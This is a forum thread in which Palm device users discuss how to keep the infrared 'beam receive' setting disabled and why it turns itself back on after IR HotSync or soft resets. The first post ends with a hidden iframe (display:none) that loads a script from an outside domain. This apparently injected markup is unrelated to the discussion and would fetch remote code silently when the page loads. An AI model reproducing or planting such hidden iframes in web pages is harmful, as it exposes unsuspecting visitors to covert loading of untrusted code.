+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Registered User
    Join Date
    03-04-2003
    Location
    Eastern NC
    Posts
    2

    Disabling Beam Receive

    Is there a way to disable beam receive permanently until the user turns it back on? The reason I ask is that I can turn off beam receive from the PDA-Prefs screen but I will check it later and it will be turned back on even though I haven't reset or repowered the device. I am trying to see if disabling it will significantly help battery life like it does for Pocket PC devices but I can't get it to stay off to find out. Any help is appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    PPC devices actively probe out for a connection. Palm doesn't unless you tell it to. Recieving readiness takes almost no power.

  3. #3
    Registered User
    Join Date
    11-06-2002
    Posts
    33
    The main reason that I'd like to disable it is because it annoys me. I hotsync via ir on my laptop, and everytime I set the phone next to the ir port to hotsync, it pops up the 'IR receive' box which i have to cancel so that I can do the hotsync.

    As with fireman, I can turn it off, but next time I go to prefs, it seems to have reenabled itself. (i'm on a 6035, but i'm guessing it doesn't matter)
    -- Everything I say is pure speculation.

  4. #4
    Registered User
    Join Date
    07-14-2002
    Posts
    330
    Originally posted by kvandivo
    The main reason that I'd like to disable it is because it annoys me. I hotsync via ir on my laptop, and everytime I set the phone next to the ir port to hotsync, it pops up the 'IR receive' box which i have to cancel so that I can do the hotsync.

    As with fireman, I can turn it off, but next time I go to prefs, it seems to have reenabled itself. (i'm on a 6035, but i'm guessing it doesn't matter)
    I also hotsync via ir port to my laptop, and I had that same problem with my 6035. I haven't had the problem with my 7135 though... No matter how long I set the 7135 next to the ir port, the beam receive message does not appear. :dunno

  5. #5
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Why not jsut disable the wireless link in the Windows control panel? You can turn off file sharing via IR in there so it should quit looking?

  6. #6
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by HoTSynC
    Why not jsut disable the wireless link in the Windows control panel? You can turn off file sharing via IR in there so it should quit looking?
    Then again, the 7135 should not be reactivating this on it's own. No other Palm device I have owned has had a problem leaving beam receive off when I turned it off.

    Alan

  7. #7
    Registered User
    Join Date
    03-04-2003
    Location
    Eastern NC
    Posts
    2
    I am hotsyncing my phone with my laptop using IR and at this point I am starting to believe that it is a IR Hotsync that turns this feature back on. Will have to investigate further.

  8. #8
    Registered User KLiuLess's Avatar
    Join Date
    11-15-2001
    Posts
    847
    The beam recv seems to turn back on for me after soft resets...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts